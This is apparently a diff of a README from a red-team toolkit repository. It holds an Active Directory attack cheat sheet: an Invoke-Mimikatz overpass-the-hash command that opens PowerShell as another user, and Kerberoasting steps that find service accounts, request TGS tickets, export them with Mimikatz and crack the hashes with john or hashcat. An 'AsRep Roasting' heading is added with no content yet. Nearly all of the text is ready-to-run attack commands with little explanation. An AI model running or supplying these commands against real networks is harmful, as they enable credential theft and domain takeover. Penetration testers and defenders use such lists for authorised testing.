SecTheBit/RedTeam-Toolkits/README.md

 - Invoke-Mimikatz -command '"sekurlsa::pth /user:studentx /domain:abc.local /ntlm: <ntlm hash of user studentx> /run:powershell.exe"' : This method is known as OverPasstheHash attack .
 This will open a new powershell process as studentx user.

-## Privilege Escalation Using Kerberos
+## Privilege Escalation

+- Kerberos

 -     Find User Account Used as Service Account
 -          Get-NetUser -SPN
 -     Requesting a TGS
 -          Add-Type -AssemblyName System.IdentityModel
 -          New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName"
 -     Export all ticket using Mimikatz
 -          Invoke-Mimikatz -Command '"kerberos::list /export"'
 -     Cracking the hash using john or hashcat

+- AsRep Roasting